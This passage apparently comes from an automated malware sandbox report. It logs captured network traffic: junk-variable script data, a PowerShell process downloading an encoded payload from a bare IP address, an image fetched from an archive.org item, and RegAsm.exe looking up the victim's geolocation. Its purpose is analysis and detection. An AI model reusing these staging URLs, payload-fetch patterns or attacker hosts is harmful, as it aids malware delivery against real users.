                                                Sep 11, 2024 20:22:16.372129917 CEST1236INData Raw: 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 57 00 4b 00 76 00 41 00 4c 00 55 00 41 00 65 00 52 00 70 00 4f 00 6a 00 22 00 0d 00 0a 00 75 00 57 00 69 00 78 00 4e 00 6a 00 69 00 68 00 6b 00 69 00 4f 00 4c 00 71 00 20 00 3d 00 20 00 22 00 64 00 62 00 57
                                                Data Ascii: k = "LWKvALUAeRpOj"uWixNjihkiOLq = "dbWGtWaiLzWLr"LlcOjxUmQOUZZ = "cQPKKiIxLKfhh"KhxfotakNkdkBoZ = "LzuKdKjrWkxWr"
                                                Sep 11, 2024 20:22:16.372142076 CEST1236INData Raw: 00 68 00 6b 00 22 00 0d 00 0a 00 4b 00 6f 00 70 00 78 00 68 00 4c 00 63 00 72 00 73 00 72 00 65 00 71 00 63 00 20 00 3d 00 20 00 22 00 47 00 4a 00 62 00 57 00 69 00 70 00 57 00 61 00 6c 00 62 00 6b 00 6b 00 6e 00 22 00 0d 00 0a 00 47 00 6c 00 57
                                                Data Ascii: hk"KopxhLcrsreqc = "GJbWipWalbkkn"GlWLKAGTfKzBe = "LLTmviWeehkok"WGiRPiSmSlkGW = "mNRczOLJWCncG"bphOimkLNWLfq = "
                                                Sep 11, 2024 20:22:16.372255087 CEST1236INData Raw: 00 61 00 4c 00 20 00 3d 00 20 00 22 00 55 00 4c 00 62 00 69 00 65 00 61 00 43 00 6a 00 4b 00 63 00 48 00 48 00 47 00 22 00 0d 00 0a 00 4c 00 70 00 6f 00 4a 00 62 00 68 00 78 00 6a 00 4a 00 63 00 70 00 69 00 47 00 20 00 3d 00 20 00 22 00 4b 00 74
                                                Data Ascii: aL = "ULbieaCjKcHHG"LpoJbhxjJcpiG = "KtOLLLxdLiUub"PbcceWefZKGKh = "glfotaAmpWCiGlc"WSuiWctkGTvpO = "qJsfkcWxidKGW"
                                                Sep 11, 2024 20:22:16.372267008 CEST552INData Raw: 00 47 00 4c 00 65 00 22 00 0d 00 0a 00 6e 00 61 00 74 00 43 00 7a 00 6a 00 69 00 63 00 41 00 4f 00 5a 00 4b 00 74 00 20 00 3d 00 20 00 22 00 50 00 52 00 4c 00 42 00 65 00 6e 00 69 00 63 00 48 00 4e 00 70 00 50 00 69 00 22 00 0d 00 0a 00 52 00 6f
                                                Data Ascii: GLe"natCzjicAOZKt = "PRLBenicHNpPi"RoGWiiGKLKGeG = "iGWOJLKzLNNAW"bltLNPfuUfWKi = "WAkNxteZBtWbi"UbWmWLlgRzvea =
                                                Sep 11, 2024 20:22:16.372277975 CEST1236INData Raw: 00 63 00 4e 00 62 00 47 00 47 00 6a 00 63 00 72 00 4c 00 20 00 3d 00 20 00 22 00 47 00 61 00 69 00 76 00 62 00 52 00 64 00 63 00 7a 00 63 00 57 00 4e 00 43 00 22 00 0d 00 0a 00 76 00 6b 00 65 00 54 00 6e 00 64 00 71 00 4e 00 66 00 47 00 4c 00 69
                                                Data Ascii: cNbGGjcrL = "GaivbRdczcWNC"vkeTndqNfGLiA = "LcqLSKxglBQqk"UKxUKaWLNcWTk = "WcinKzNoJzgWA"KRlcdtOLemOPf = "KBcecdi
                                                Sep 11, 2024 20:22:16.372288942 CEST1236INData Raw: 00 49 00 55 00 69 00 4e 00 57 00 74 00 41 00 70 00 22 00 0d 00 0a 00 4f 00 4b 00 47 00 78 00 6e 00 66 00 69 00 4e 00 74 00 62 00 6e 00 74 00 4c 00 20 00 3d 00 20 00 22 00 78 00 5a 00 57 00 65 00 7a 00 75 00 65 00 6b 00 6d 00 57 00 6a 00 6b 00 4c
                                                Data Ascii: IUiNWtAp"OKGxnfiNtbntL = "xZWezuekmWjkL"KAAbLJfWLZZKB = "GjKLeIUpGmKlL"clGGOPKbbAaCn = "mBLWfctcWcTGj"AoOUiiiti
                                                Sep 11, 2024 20:22:16.377110958 CEST1236INData Raw: 00 7a 00 41 00 4b 00 6c 00 6c 00 41 00 20 00 3d 00 20 00 22 00 6d 00 55 00 57 00 6b 00 62 00 4c 00 47 00 4e 00 75 00 4c 00 62 00 6d 00 64 00 22 00 0d 00 0a 00 57 00 50 00 57 00 4f 00 4f 00 4e 00 69 00 69 00 47 00 4c 00 57 00 76 00 49 00 20 00 3d
                                                Data Ascii: zAKllA = "mUWkbLGNuLbmd"WPWOONiiGLWvI = "qtLKWriAjCmiT"UlPPBkiJqLWkb = "bzCcbKpCbfxAK"LdeaBpcfcuUcA = "PlGjJzZzUKWJ


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.224916345.90.89.123803644C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 11, 2024 20:22:23.731884003 CEST75OUTGET /421/UNOST.txt HTTP/1.1
                                                Host: 45.90.89.123
                                                Connection: Keep-Alive
                                                Sep 11, 2024 20:22:24.469748974 CEST1236INHTTP/1.1 200 OK
                                                Date: Wed, 11 Sep 2024 18:22:24 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                Last-Modified: Tue, 10 Sep 2024 10:49:55 GMT
                                                ETag: "a1000-621c1a24a50c7"
                                                Accept-Ranges: bytes
                                                Content-Length: 659456
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/plain
                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                Sep 11, 2024 20:22:24.469768047 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                Sep 11, 2024 20:22:24.469779968 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                Sep 11, 2024 20:22:24.469784021 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                Sep 11, 2024 20:22:24.469845057 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                Sep 11, 2024 20:22:24.469857931 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                Sep 11, 2024 20:22:24.469868898 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                Sep 11, 2024 20:22:24.469875097 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                Sep 11, 2024 20:22:24.469950914 CEST1236INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                Sep 11, 2024 20:22:24.469964027 CEST1236INData Raw: 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45
                                                Data Ascii: UKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKP
                                                Sep 11, 2024 20:22:24.475203037 CEST1236INData Raw: 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61 4f 5a 6d 7a 62 35 55 57 4f 65 6c 7a
                                                Data Ascii: szA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyNLYzu24qNgaTj


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.2249165178.237.33.50803752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 11, 2024 20:22:30.763412952 CEST71OUTGET /json.gp HTTP/1.1
                                                Host: geoplugin.net
                                                Cache-Control: no-cache
                                                Sep 11, 2024 20:22:31.382930040 CEST1170INHTTP/1.1 200 OK
                                                date: Wed, 11 Sep 2024 18:22:31 GMT
                                                server: Apache
                                                content-length: 962
                                                content-type: application/json; charset=utf-8
                                                cache-control: public, max-age=300
                                                access-control-allow-origin: *
                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.2249162207.241.227.964433644C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-11 18:22:21 UTC113OUTGET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                                Host: ia601706.us.archive.org
                                                Connection: Keep-Alive
                                                2024-09-11 18:22:21 UTC582INHTTP/1.1 200 OK
                                                Server: nginx/1.25.1
                                                Date: Wed, 11 Sep 2024 18:22:21 GMT
                                                Content-Type: image/jpeg
                                                Content-Length: 1931225
                                                Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                                Connection: close
                                                ETag: "66d918ff-1d77d9"
                                                Strict-Transport-Security: max-age=15724800
                                                Expires: Thu, 12 Sep 2024 00:22:21 GMT
                                                Cache-Control: max-age=21600
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                Access-Control-Allow-Credentials: true
                                                Accept-Ranges: bytes
                                                2024-09-11 18:22:21 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                2024-09-11 18:22:22 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                                Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                                2024-09-11 18:22:22 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                                Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                                2024-09-11 18:22:22 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                                Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                                2024-09-11 18:22:22 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                                Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
